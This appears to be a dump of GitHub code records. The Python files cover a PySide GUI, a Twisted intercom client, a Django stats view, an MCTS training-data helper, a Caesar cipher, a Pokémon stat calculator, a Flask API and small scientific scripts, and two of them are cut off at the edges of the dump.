self.mainLayout.addWidget(self.titulo)\r\n \r\n self.botonViaje = Button(string=\"Nuevo Viaje\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonViaje)\r\n self.botonViaje.clicked.connect(self.abrirVentanaViaje)\r\n \r\n self.botonEmpresa = Button(string=\"Empresa\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonEmpresa)\r\n self.botonEmpresa.clicked.connect(self.abrirVentanaEmpresa)\r\n \r\n self.botonChoferes = Button(string=\"Choferes\", fontF=\"Cambria\", fontS=20)\r\n self.mainLayout.addWidget(self.botonChoferes)\r\n self.botonChoferes.clicked.connect(self.abrirVentanaChoferes)\r\n\r\n centralWidget = QWidget()\r\n centralWidget.setLayout(self.mainLayout)\r\n self.setCentralWidget(centralWidget)\r\n \r\n def abrirVentanaViaje(self):\r\n self.windowViaje = WindowViaje()\r\n self.windowViaje.show()\r\n\r\n def abrirVentanaEmpresa(self):\r\n self.windowEmpresa = WindowEmpresa()\r\n self.windowEmpresa.show()\r\n \r\n def abrirVentanaChoferes(self):\r\n self.windowChoferes = WindowChoferes()\r\n self.windowChoferes.show()\r\n \r\nif __name__ == '__main__':\r\n app = QApplication()\r\n window = VentanaPrincipal()\r\n window.setStyleSheet(\"background-color: darkgray\")\r\n window.show()\r\n app.exec()","repo_name":"pablokan/side","sub_path":"efis/B/nine/proyecto/ventanaPrincipal.py","file_name":"ventanaPrincipal.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9263376454","text":"from __future__ import print_function\nimport time\nfrom schedule import Heap\nimport plugins\nfrom twisted.internet import reactor,protocol,endpoints,task\nfrom twisted.protocols.basic import LineReceiver\n\n__author__ = 'wstevens'\n\nclass IntercomProtocol(LineReceiver):\n\n def check(self):\n if not self.factory.heap.empty():\n run_time, cmd = self.factory.heap.peek()\n if run_time <= time.time():\n self.factory.heap.pop()\n cmd.act()\n\n def connectionMade(self):\n print(\"Connected successfully\")\n c = task.LoopingCall(self.check)\n c.start(5.0)\n\n def lineReceived(self, line):\n if line:\n parts = line.decode('utf-8','ignore').split(\"|\")\n if len(parts) >= 2:\n parts[0]=' '.join(parts[:-1])\n parts[1]=parts[-1]\n print(parts[1],\"New Message Recieved: \",parts[0])\n sc = plugins.command.SayCommand(parts[0])\n self.factory.heap.push(float(parts[1]), sc)\n \n\nclass IntercomClientFactory(protocol.ClientFactory):\n protocol = IntercomProtocol\n heap = Heap()\n\n def clientConnectionFailed(self, connector, reason):\n print('connection failed:', reason.getErrorMessage())\n time.sleep(5)\n connector.disconnect()\n connector.connect()\n \n def clientConnectionLost(self, connector, reason):\n print('connection lost:', reason.getErrorMessage())\n connector.disconnect()\n connector.connect()\n\n def buildProtocol(self, addr):\n p = self.protocol()\n p.factory = self\n return p\n\ntry:\n with open('server.key.txt') as f:\n server = f.read().strip()\nexcept Exception:\n server = 'localhost'\n\nconnector = reactor.connectTCP(server, 42124, IntercomClientFactory())\nprint('connecting to:',server)\nreactor.run()\n\n","repo_name":"wasv/intercom","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"} +{"seq_id":"37128524240","text":"import json\nimport random\nfrom datetime import datetime, timedelta\n\nfrom django.db.models import Sum, Avg, Max\nfrom django.shortcuts import render\nfrom rest_framework.authtoken.models import Token\n\nfrom .models import UserData, Profile\n\n\ndef home_page(request):\n return render(request, 'Data/home_page.html', context={})\n\n\ndef ranking(request):\n # User token:\n # ----------------------------------------------------\n token = Token.objects.get(user=request.user) if request.user.is_authenticated else None\n\n # Best Contributors table:\n # ----------------------------------------------------\n\n # Get best first 25 contributors from db\n best_friends = Profile.objects.order_by('-score')[:25]\n\n # Format data to json for frontend\n bffs = [{'user': profile.user, 'score': profile.score, 'position': i + 1} for i, profile in enumerate(best_friends)]\n\n # Graph data:\n # ----------------------------------------------------\n\n # Creating list of days of this week\n days_this_week = []\n today = datetime.today().date()\n for i in range(8):\n date = (today + timedelta(days=-i))\n days_this_week.append(str(date))\n\n # Creating list of scores from this week\n score_this_week = []\n for i in range(8):\n score = sum([obj.score for obj in\n UserData.objects.filter(uploaded_at__date=datetime.today().date() - timedelta(days=i))])\n score_this_week.append(score)\n\n # Zipping scores and dates into one dict\n data = dict(zip(days_this_week, score_this_week))\n\n # Progress Bar data:\n # ----------------------------------------------------\n score_sum = Profile.objects.aggregate(Sum('score'))['score__sum']\n score_sum = score_sum if score_sum is not None else 0\n\n # Percent of individual help\n total_time_played = round(score_sum / 3600, 2)\n if request.user.is_authenticated and score_sum > 0:\n help_percent = round(100 * (Profile.objects.get(user=request.user).score) / score_sum, 1)\n else:\n help_percent = 0\n\n # Data Submitted:\n # ----------------------------------------------------\n if request.user.is_authenticated:\n uploads = UserData.objects.filter(user=request.user).order_by('-uploaded_at')\n\n user_data = []\n for upload in uploads:\n date = upload.uploaded_at.strftime('%Y-%m-%d %H:%M:%S')\n user_data.append({\"score\": upload.score, \"id\": upload.id, \"uploaded_at\": date})\n\n else:\n user_data = {}\n\n # Number of users:\n # ----------------------------------------------------\n n_users = Profile.objects.all().count()\n\n # Average number of frames per user\n # ----------------------------------------------------\n avg_user_score = Profile.objects.aggregate(Avg('score'))['score__avg']\n avg_user_score = round(avg_user_score) if avg_user_score is not None else 0\n\n # Average number of sessions per user\n # ----------------------------------------------------\n avg_session_score = UserData.objects.aggregate(Avg('score'))['score__avg']\n avg_session_score = round(avg_session_score) if avg_session_score is not None else 0\n\n avg_session_time = round(avg_session_score / 60, 2) if avg_session_score is not None else 0\n\n # Top 3 users\n # ----------------------------------------------------\n top_3_score_sum = Profile.objects.order_by('-score')[:3].aggregate(Sum('score'))['score__sum']\n if top_3_score_sum is not None and score_sum > 0:\n top_3_score_percent = round(100 * top_3_score_sum / score_sum, 2)\n else:\n top_3_score_percent = 0\n\n # Longest fishing session\n # ----------------------------------------------------\n max_score = UserData.objects.aggregate(Max('score'))['score__max']\n max_score_users = UserData.objects.filter(score=max_score)\n\n if max_score_users is not None and max_score is not None:\n rand_user = random.randint(0, len(max_score_users) - 1)\n\n max_score_user = [user for user in max_score_users][rand_user]\n time = round(max_score / 60, 1)\n else:\n max_score = 0\n max_score_user = 'admin'\n time = 0\n\n longest_session_dict = {'max_score': max_score, 'user': max_score_user, 'time': time}\n\n return render(request, 'Data/dashboard.html', context={\n\n 'bffs_dict': bffs,\n 'data': json.dumps(data),\n 'score_sum': score_sum,\n 'total_time_played': total_time_played,\n 'user_data': user_data,\n 'help_percent': help_percent,\n 'n_users': n_users,\n 'avg_user_score': avg_user_score,\n 'avg_session_score': avg_session_score,\n 'avg_session_time': avg_session_time,\n 'top_3_score_percent': top_3_score_percent,\n 'longest_session': longest_session_dict,\n 'token': token\n })\n","repo_name":"Setti7/Stardew-Web","sub_path":"Data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"15062741986","text":"import requests\n\n\n\nurl = \"https://httpbin.org/get\"\n\nargs = {\n \"nombre\":\"Juan\",\n \"curso\":\"python\",\n \"nivel\":\"intermedio\"\n }\n\nresponse = requests.get(url,params=args)\n\nprint(response.url)\n\nif response.status_code == 200:\n print(response.content)","repo_name":"AlexOlivaresP/CifradorFLASK","sub_path":"ejemploe/uno.py","file_name":"uno.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17478133330","text":"import numpy as np\n\ndef get_data(mcts, max_moves=150, nnet=True, prop_thresh=30, verbose=0, return_moves=True):\n \"\"\"\n Gets the data that can be used to train an agent (typically a neural net). Uses MCTS\n to generate policies and rewards that are then returned.\n\n Params\n ------\n \n mcts: MCTS\n The monte carlo tree search object to use.\n\n max_moves: int, default=150\n The maximum number of moves the game can make before considering the game a draw.\n\n nnet: bool, default=False\n Whether the data should e acceptable to a neural network.\n\n prop_thresh: int, default=50\n Proportionality threshold for the prop constant in the mcts policy. The threshold defines the move\n after which the MCTS starts behaving greedily.\n\n verbose: int, default=0\n The verbosity of the state. Accepts 0 or 1 (verbose or not).\n\n return_move: bool, default=False\n Whether to return the number of moves as well as the data.\n\n Returns\n -------\n\n data: list\n The encoded data, containing training examples in the form [(state, target_pi, target_value),...].\n\n moves: int, optional\n The number of moves played. Only returns if return_move is True.\n \"\"\"\n memory = [] # place to store states as we play\n possible_moves = mcts.action_space\n game= mcts.game\n board_state = game.state()\n\n for move in range(max_moves):\n # get the game state and current player for the nn\n # TODO: allow for symmetric game\n # states = game.get_symmetries(nnet)\n state = game.state(nnet)\n cur_play = game.current_player()\n\n # use mcts to get a policy\n prop = int(move < prop_thresh)\n mcts.train()\n policy = mcts.get_policy(prop=prop)\n\n # choose an action based off this state\n act = np.random.choice(possible_moves, p=policy)\n\n # store the state, policy, and player\n #for state in states:\n # memory.append([state, policy, cur_play])\n memory.append([state, policy, cur_play])\n\n # perform this action\n s = game.state()\n game.move(act)\n mcts.update()\n if verbose:\n print(mcts.get_Qsa(s, act), mcts.get_Nsa(s, act), game.engine.result(), game.current_player())\n print(game.board())\n \n\n # check if the game is over\n v = game.winner()\n if v !=0:\n # game over state\n # it's currently the move of the loser, so v=-1\n # all states that have this player should have a v=-1\n # all states that have the other player should have v=1\n # so check the current player\n cur_play = game.current_player()\n # so if cur_play = sa.cur_play, return v=-1\n # if cur_play != sa.cur_play, return v=1\n data = [(x[0], x[1], v if x[2] == cur_play else -v) for x in memory]\n # reset the game\n game.set_state(board_state)\n mcts.update()\n if return_moves:\n return data, move+1\n return data\n # max moves was reached\n # here the outcome is a draw\n if verbose:\n print(\"Game ended in draw, max_moves was met\")\n v = 0\n data = [(x[0], x[1], v) for x in memory]\n game.set_state(board_state)\n mcts.update()\n if return_moves:\n return data, move+1\n return data","repo_name":"jasonrobwebster/alphazero-clone","sub_path":"coach/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"8047754542","text":"\"\"\"Caesar cipher.\"\"\"\n\n\ndef encode(message: str, shift: int):\n \"\"\"Encode a message using a Caesar cipher.\"\"\"\n new_message: str = \"\"\n if shift > 26: # If shift = 26 than it is the same letter\n shift %= 26 # Skips useless laps (lap = 26) and finds useful shift\n for element in message: # Loop checks every letter per iteration\n if ord(element) > 122 or 97 > ord(element): # Elements that not from a...z\n new_message += element # Leave item the same\n else:\n new_element = ord(element) + shift\n if new_element > 122:\n new_element = 96 + (new_element - 122) # Searches for element in range from a...z\n new_message += chr(new_element) # Adds new element\n else:\n new_message += chr(new_element)\n return new_message\n\n\nif __name__ == '__main__':\n print(encode(\"i like turtles\", 6)) # -> o roqk zaxzrky\n print(encode(\"o roqk zaxzrky\", 20)) # -> i like turtles\n print(encode(\"example\", 1)) # -> fybnqmf\n print(encode(\"don't change\", 0)) # -> don't change\n print(encode('the quick brown fox jumps over the lazy dog.', 7)) # -> aol xbpjr iyvdu mve qbtwz vcly aol shgf kvn.\n","repo_name":"aKaidalov/iti0102-2022","sub_path":"EX/ex02_math/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72500347953","text":"\"\"\"Module instantiating a slithering animal\"\"\"\nfrom datetime import date\n\nclass Hognose:\n \"\"\"Class representing an animal\"\"\"\n def __init__(self, name, species):\n # Establish the properties of each animal\n # with a default value\n self.name = name\n self.species = species\n self.date_added = date.today()\n self.slithering = True\nbaby_cakes = Hognose(\"Baby Cakes\", \"Southern Hognose snake\")\nprint(baby_cakes)\n","repo_name":"dontcallmeplath/petting-zoo","sub_path":"slithering/Hognose.py","file_name":"Hognose.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"8268783834","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom fractions import Fraction\nfrom typing import Optional\n\nimport voluptuous as vlps\n\nfrom pkmn_stat_type import StatType, GenStatType\nfrom utils import enum_const_dict, multiplier_range_frac, IntRange, IntOrRange_T, FracRange, FracOrRange_T,\\\n\tFloatOrRange_T\nfrom nature import Nature\n\n\nLVL_RANGE = IntRange(1, 100)\n# Used in formulas\nLVL_NORM = 100\n\n\nclass BaseStats(enum_const_dict(StatType, int)):\n\tpass\n\n\nclass IVRanges(enum_const_dict(StatType, IntOrRange_T)):\n\tpass\n\n\nclass EVs(enum_const_dict(StatType, int)):\n\tpass\n\n\nclass Stats(enum_const_dict(StatType, IntOrRange_T)):\n\tpass\n\n\nclass GenStats(enum_const_dict(GenStatType, IntOrRange_T)):\n\tpass\n\n\nclass GenStatsNormalized(enum_const_dict(GenStatType, FloatOrRange_T)):\n\tpass\n\n\n@dataclass(slots=True)\nclass StatData:\n\tvalue: int = None\n\tiv: Optional[IntOrRange_T] = None\n\tev: Optional[IntOrRange_T] = None\n\n\t@classmethod\n\tdef bare_val(cls, value: int = None) -> StatData:\n\t\treturn cls(value=value, ev=0)\n\n\nclass StatsData(enum_const_dict(StatType, StatData)):\n\t...\n\n\n# Structure like:\n# {\n# StatType.HP: 100, # `value` argument\n# StatType.ATK: {\"value\": 70, \"ev\": 252},\n# StatType.DEF: {\"value\": 90, \"ev\": None, \"iv\": IntRange(4, 7)},\n# ...\n# }\nInputStatsData_T = dict[\n\tStatType,\n\tIntOrRange_T | None | dict[\n\t\tstr,\n\t\tIntOrRange_T | None\n\t]\n]\n\n\nNatureMult_T = int | Fraction\n\n\nclass Stat:\n\tBASE_RANGE = IntRange(0, 256)\n\tIV_RANGE = IntRange(0, 31)\n\tEV_RANGE = IntRange(0, 252)\n\n\tDEFAULT_MULT = 1\n\tINCREASED_MULT = Fraction(11, 10)\n\tDECREASED_MULT = Fraction(9, 10)\n\tMULT_RANGE = FracRange(DECREASED_MULT, INCREASED_MULT)\n\tPOSSIBLE_MULTS = DEFAULT_MULT, INCREASED_MULT, DECREASED_MULT\n\n\t@classmethod\n\tdef get_mult(cls, stat_type: StatType, nature: Nature):\n\t\tif stat_type == StatType.HP:\n\t\t\treturn None\n\t\telif nature.is_simple():\n\t\t\treturn cls.DEFAULT_MULT\n\t\telif stat_type == nature.increased:\n\t\t\treturn cls.INCREASED_MULT\n\t\telif stat_type == nature.decreased:\n\t\t\treturn cls.DECREASED_MULT\n\t\telse:\n\t\t\treturn cls.DEFAULT_MULT\n\n\tdef __init__(\n\t\tself,\n\t\ttype_: StatType,\n\t\tbase: int,\n\t\tlvl: int = None,\n\t\tval: int = None,\n\t\tiv: Optional[IntOrRange_T] = None,\n\t\tev: int = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t):\n\t\tself._type = vlps.Schema(StatType)(type_)\n\t\tself._base = vlps.Schema(vlps.All(int, self.BASE_RANGE.in_validator))(base)\n\t\tself._lvl = vlps.Schema(vlps.Maybe(vlps.All(int, LVL_RANGE.in_validator)))(lvl)\n\t\tself._iv = vlps.Schema(vlps.Maybe(\n\t\t\tvlps.All(\n\t\t\t\tvlps.Any(IntRange, vlps.All(int, vlps.Coerce(IntRange))),\n\t\t\t\tself.IV_RANGE.in_validator,\n\t\t\t\tIntRange.is_straight_validator\n\t\t\t)\n\t\t))(iv)\n\t\tself._ev = vlps.Schema(vlps.Maybe(vlps.All(int, self.EV_RANGE.in_validator)))(ev)\n\n\t\tif type_ == StatType.HP:\n\t\t\t# For HP multiplier always is None (not used), but for protection\n\t\t\t# against gross typos:\n\t\t\tif mult is not None and mult != self.DEFAULT_MULT:\n\t\t\t\traise ValueError(f\"{StatType.HP} can not have nature multiplier\")\n\t\t\tself._mult = None\n\t\telif mult is None:\n\t\t\tself._mult = None\n\t\telse:\n\t\t\tself._mult = vlps.Schema(vlps.In(self.POSSIBLE_MULTS))(mult)\n\n\t\tif val is None:\n\t\t\tself._val = None\n\t\t\ttry:\n\t\t\t\tself._val = self.get_val()\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\tself._val = vlps.Schema(vlps.All(int, self.calc_val(\n\t\t\t\t\tself._type,\n\t\t\t\t\tself._base,\n\t\t\t\t\tself._iv,\n\t\t\t\t\tself._ev,\n\t\t\t\t\tself._lvl,\n\t\t\t\t\tself._mult\n\t\t\t\t).in_validator))(val)\n\t\t\texcept vlps.Error as e:\n\t\t\t\traise ValueError(f\"{self._type} {e}\")\n\n\t@property\n\tdef type(self) -> StatType:\n\t\treturn self._type\n\n\t@property\n\tdef base(self) -> int:\n\t\treturn self._base\n\n\t@classmethod\n\tdef _calc_hp_val(\n\t\tcls,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T\n\t) -> IntOrRange_T:\n\t\treturn (2*base + iv + ev//4) * lvl // LVL_NORM + lvl + 10\n\n\t@classmethod\n\tdef _calc_non_hp_val(\n\t\tcls,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T,\n\t\tmult: FracOrRange_T\n\t) -> IntOrRange_T:\n\t\tval = (2*base + iv + ev//4) * lvl // LVL_NORM + 5\n\t\tif mult != cls.DEFAULT_MULT:\n\t\t\tval = val * mult.numerator // mult.denominator\n\n\t\treturn val\n\n\t@classmethod\n\tdef _calc_val(\n\t\tcls,\n\t\ttype_: StatType,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T,\n\t\tmult: Optional[FracOrRange_T] # None for HP.\n\t) -> IntOrRange_T:\n\t\tif type_ == StatType.HP:\n\t\t\treturn cls._calc_hp_val(base, lvl, iv, ev)\n\t\telse:\n\t\t\treturn cls._calc_non_hp_val(base, lvl, iv, ev, mult)\n\n\t@classmethod\n\tdef calc_val(\n\t\tcls,\n\t\ttype_: StatType,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T = None,\n\t\tiv: IntOrRange_T = None,\n\t\tev: IntOrRange_T = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t) -> IntOrRange_T:\n\t\tif lvl is None:\n\t\t\tlvl = LVL_RANGE\n\n\t\tif iv is None:\n\t\t\tiv = cls.IV_RANGE\n\n\t\tif ev is None:\n\t\t\tev = cls.EV_RANGE\n\n\t\tif type_ == StatType.HP:\n\t\t\tif mult is not None:\n\t\t\t\traise ValueError(f\"{StatType.HP} can not have nature multiplier\")\n\t\telif mult is None:\n\t\t\tmult = cls.MULT_RANGE\n\n\t\treturn cls._calc_val(type_, base, lvl, iv, ev, mult)\n\n\tdef get_val(\n\t\tself,\n\t\tlvl: Optional[IntOrRange_T] = None,\n\t\tiv: Optional[IntOrRange_T] = None,\n\t\tev: Optional[IntOrRange_T] = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t) -> IntOrRange_T:\n\t\t\"\"\"Get stat value.\"\"\"\n\t\tif lvl is None:\n\t\t\tlvl = self._lvl\n\n\t\tif iv is None:\n\t\t\tiv = self._iv\n\n\t\tif ev is None:\n\t\t\tev = self._ev\n\n\t\tif mult is None:\n\t\t\tmult = self._mult\n\n\t\treturn self.calc_val(self._type, self._base, lvl, iv, ev, mult)\n\n\tdef get_iv(\n\t\tself,\n\t\tlvl: int = None,\n\t\tval: int = None,\n\t\tev: Optional[IntOrRange_T] = None,\n\t\tmult: Optional[NatureMult_T] = None # None for self value\n\t) -> IntRange:\n\t\tif lvl is None:\n\t\t\tif self._lvl is None:\n\t\t\t\traise ValueError(\"Lvl must be specified\")\n\t\t\tlvl = self._lvl\n\n\t\tif val is None:\n\t\t\tif self._val is None:\n\t\t\t\traise ValueError(\"Stat value must be specified\")\n\t\t\tval = self._val\n\n\t\tif ev is None:\n\t\t\tev = self._ev\n\n\t\tif mult is None:\n\t\t\tif self._mult is None and self._type != StatType.HP:\n\t\t\t\traise ValueError(\"Nature multiplier must be specified\")\n\t\t\tmult = self._mult\n\n\t\t# HP = (2*base + iv + ev//4) * lvl // LVL_NORM + lvl + 10\n\t\t# NON_HP = ((2*base + iv + ev//4) * lvl // LVL_NORM + 5) * mult\n\n\t\tif self._type == StatType.HP:\n\t\t\trange_ = val - 10 - lvl\n\t\telif mult != self.DEFAULT_MULT:\n\t\t\trange_ = multiplier_range_frac(mult, val) - 5\n\t\telse:\n\t\t\trange_ = val - 5\n\n\t\trange_ = multiplier_range_frac(Fraction(lvl, LVL_NORM), range_)\n\t\trange_ -= 2*self._base + ev//4\n\t\ttry:\n\t\t\trange_.clamp(self.IV_RANGE)\n\t\texcept ValueError as e:\n\t\t\traise ValueError(f\"Calculated {self._type.name} IVs are impossible: {e}\") from e\n\n\t\treturn range_\n\n\ndef main():\n\tlvl = 78\n\n\t# stats = [\n\t# \tStat(StatType.HP, base=108, iv=24, lvl=lvl, ev=74),\n\t# \tStat(StatType.ATK, base=130, iv=12, lvl=lvl, ev=190, mult=Stat.INCREASED_MULT),\n\t# \tStat(StatType.DEF, base=95, iv=30, lvl=lvl, ev=91),\n\t# \tStat(StatType.SPATK, base=80, iv=16, lvl=lvl, ev=48, mult=Stat.DECREASED_MULT),\n\t# \tStat(StatType.SPDEF, base=85, iv=23, lvl=lvl, ev=84),\n\t# \tStat(StatType.SPEED, base=102, iv=5, lvl=lvl, ev=23)\n\t# ]\n\t# for stat in stats:\n\t# \tprint(f\"{stat._type.name}: {stat.get_val(lvl)}\")\n\n\tstats = [\n\t\tStat(StatType.HP, base=108, val=289, lvl=lvl, ev=74), # 24\n\t\tStat(StatType.ATK, base=130, val=278, lvl=lvl, ev=190, mult=Stat.INCREASED_MULT), # 12\n\t\tStat(StatType.DEF, base=95, val=193, lvl=lvl, ev=91), # 30\n\t\tStat(StatType.SPATK, base=80, val=135, lvl=lvl, ev=48, mult=Stat.DECREASED_MULT), # 16\n\t\tStat(StatType.SPDEF, base=85, val=171, lvl=lvl, ev=84), # 23\n\t\tStat(StatType.SPEED, base=102, val=171, lvl=lvl, ev=23) # 5\n\t]\n\n\tfor stat in stats:\n\t\tprint(f\"{stat.type.name}: {stat.get_iv()}\")\n\tprint()\n\n\tstats = [\n\t\tStat(StatType.HP, base=70, val=54, lvl=17), # 24\n\t\tStat(StatType.ATK, base=110, val=45, lvl=17), # 12\n\t\tStat(StatType.DEF, base=180, val=60, lvl=17, mult=Stat.DECREASED_MULT), # 30\n\t\tStat(StatType.SPATK, base=60, val=28, lvl=17), # 16\n\t\tStat(StatType.SPDEF, base=60, val=30, lvl=17, mult=Stat.INCREASED_MULT), # 23\n\t\tStat(StatType.SPEED, base=50, val=22, lvl=17) # 5\n\t]\n\n\tfor stat in stats:\n\t\tprint(f\"{stat.type.name}: {stat.get_iv()}\")\n\tprint()\n\n\tlvl = 50\n\tprint(Stat.calc_val(type_=StatType.HP, base=70, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.ATK, base=110, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.DEF, base=180, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPATK, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPDEF, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPEED, base=50, lvl=lvl))\n\tprint()\n\n\tlvl = 100\n\tprint(Stat.calc_val(type_=StatType.HP, base=70, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.ATK, base=110, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.DEF, base=180, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPATK, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPDEF, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPEED, base=50, lvl=lvl))\n\tprint()\n\n\n\t# sd = StatsData({\n\t# \tStatType.HP: StatData(51),\n\t# \tStatType.ATK: StatData(17),\n\t# \tStatType.DEF: StatData(39),\n\t# \tStatType.SPATK: StatData(15),\n\t# \tStatType.SPDEF: StatData(18),\n\t# \tStatType.SPEED: StatData(51)\n\t# })\n\t# pretty_print(sd)\n\n\t# print(multiplier_range_frac(Fraction(76, 100), 200))\n\t# print()\n\t# print(multiplier_range_frac(Fraction(13, 100), 51))\n\t#\n\t# sd = StatsData({\n\t# \tst: StatData()\n\t# \tfor st in StatType\n\t# })\n\t# pretty_print(sd)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Avorthoren/pkmn_py","sub_path":"pkmn_stat.py","file_name":"pkmn_stat.py","file_ext":"py","file_size_in_byte":9533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4586284056","text":"from flask import Flask, render_template, jsonify\nimport json\nfrom crime import SeattlePDApi\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', title=\"Home\")\n\n\n@app.route('/api/raw')\n@app.route('/api/raw/')\ndef api_raw(limit=20):\n path = r'C:\\dev\\jim\\seattle_crime\\exports\\raw_json_20181102.json'\n with open(path, 'r') as _f:\n data = json.load(_f)\n _f.close()\n \n if limit:\n data = data[:limit]\n return jsonify(data)\n\n@app.route('/api/bydate')\ndef crime_by_date():\n s = SeattlePDApi()\n data = s.get_crimes_by_date()\n return jsonify(data)","repo_name":"cryocaustik/PyApiToHtml","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"8059211252","text":"from load_modules import *\n\n#run_type = 1 # indiv script selection 0 = save only / 1 = show only / 2 = save and show\n\nCoM_trace = np.empty([1,4])# np.empty(4) # first 3 columns = coords, 4th = time/scale factor\n\ni = 0\nwhile True:\n\ttry:\n\t\tfname = get_snap_filename('../Output', i*10)\n\t\tR = np.asarray(get_snap_data(fname, 1, 'Coordinates'))\n#\t\tprint(fname)\n\t\tn = get_attribute(fname,'NumPart_ThisFile')[1]\n\t\tM = np.full(n, 1)\n\t\tR_CoM = find_CoM(R, M)\n\t\ta = get_attribute(fname,'Time')\n\t\tstack = np.hstack((R_CoM,a))\n\t\tCoM_trace = np.append(CoM_trace, [stack], axis=0)\n#\t\tprint(CoM_trace[i])\n\texcept(KeyError, OSError, NameError, UnboundLocalError, IOError):\n\t\tbreak\n\telse:\n i += 1\n#print(CoM_trace)\n\n#projection in xy, xz, yz planes\n\nfig1 = plt.figure()\nax = fig1.add_subplot(projection='3d')\nax.scatter3D(CoM_trace[:,0], CoM_trace[:,1], CoM_trace[:,2])\nplt.title('Plot tracing halo CoM location through time [IC]')\nax.set_xlabel(r'$x\\; [kpc]$')\nax.set_ylabel(r'$y\\; [kpc]$')\nax.set_zlabel(r'$z\\; [kpc]$')\n\n\n#### BULK RUN OPTIONS ####\n\nif run_type == 0 or run_type == 2:\n\tfig1.savefig('./IC_halo_plots/IC_halo_CoM_trace.pdf') \n\nif run_type == 1 or run_type == 2:\n plt.show()\n\n\n","repo_name":"UONGGuy/DynamicalFriction_on_SMBH_scripts","sub_path":"halo_scripts/halo_CoM_trace.py","file_name":"halo_CoM_trace.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74244491954","text":"import setuptools\nimport os\n\n# Open and read README.md\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n# Open and read requirements.txt\nbaseDir = os.path.dirname(os.path.realpath(__file__))\nrequirements_path = baseDir + '/requirements.txt'\ninstall_requires = []\nif os.path.isfile(requirements_path):\n with open(requirements_path, 'r') as f:\n install_requires = f.read().splitlines()\n\nsetuptools.setup(\n name=\"BeautifulSites4\",\n version=\"1.1.1-alpha\",\n author=\"HipyCas\",\n author_email=\"hipycas+python@gmail.com\",\n description=\"An implementation of BeautifulSoup4 for some popular webpages\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/HipyCas/BeautifulSites\",\n packages=setuptools.find_packages(),\n install_requires=install_requires,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"HipyCas/BeautifulSites","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"9797828346","text":"from __future__ import absolute_import, division, print_function\n\nimport math\n\nfrom builtins import * # @UnusedWildImport\nfrom tkinter import messagebox\n\nfrom mcculw import ul\nfrom mcculw.enums import Status, FunctionType, ScanOptions\nfrom examples.ui.uiexample import UIExample\nfrom examples.props.ao import AnalogOutputProps\nfrom mcculw.ul import ULError\nimport tkinter as tk\n\n\nclass ULAO04(UIExample):\n def __init__(self, master=None):\n super(ULAO04, self).__init__(master)\n\n self.board_num = 0\n self.ao_props = AnalogOutputProps(self.board_num)\n\n self.create_widgets()\n\n def start_scan(self):\n # Build the data array\n self.low_chan = self.get_low_channel_num()\n self.high_chan = self.get_high_channel_num()\n self.num_chans = self.high_chan - self.low_chan + 1\n\n if self.low_chan > self.high_chan:\n messagebox.showerror(\n \"Error\",\n \"Low Channel Number must be greater than or equal to High \"\n \"Channel Number\")\n self.set_ui_idle_state()\n return\n\n points_per_channel = 1000\n 